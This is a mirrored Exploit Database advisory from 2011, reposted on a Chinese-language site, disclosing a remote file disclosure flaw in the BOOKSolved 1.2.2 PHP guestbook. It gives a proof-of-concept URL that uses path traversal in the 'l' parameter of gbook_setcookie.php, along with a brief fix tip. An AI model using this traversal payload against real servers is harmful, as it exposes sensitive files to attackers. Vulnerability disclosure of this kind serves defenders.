BOOKSolved 1.2.2 – Remote File Disclosure

• Exploit Database
• 124 阅读

• 作者： bd0rk
  日期： 2011-10-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17943/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34

  ...BOOKSolved 1.2.2 (l) Remote File Disclosure Vulnerability   ...Discovered by bd0rk   ...Contact: bd0rk[at]hackermail.com or follow me on twitter   ...Greetz: inj3ct0r-Team, x0r_32, Perle, Siber King   ...Tested on: Ubuntu-Linux   ...MEZ-Time: 08:17   ...Vendor: http://www.usolved.net/   ...Download: http://www.usolved.net/scripts/booksolved_v1.2.2.zip   ----------------------------------------------------------------------------   PoC: http://[targethost]/[path]/inc/gbook_setcookie.php?l=../../R3adIn.php   ----------------------------------------------------------------------------   Description: Found vulnerable code in gbook_setcookie.php line 7. So an attacker can read in sensitive files about l-parameter.     bd0rk's-Fixtip: Percolate the l-parameter before $_GET       Greetings from Germany, the 22 years old bd0rk.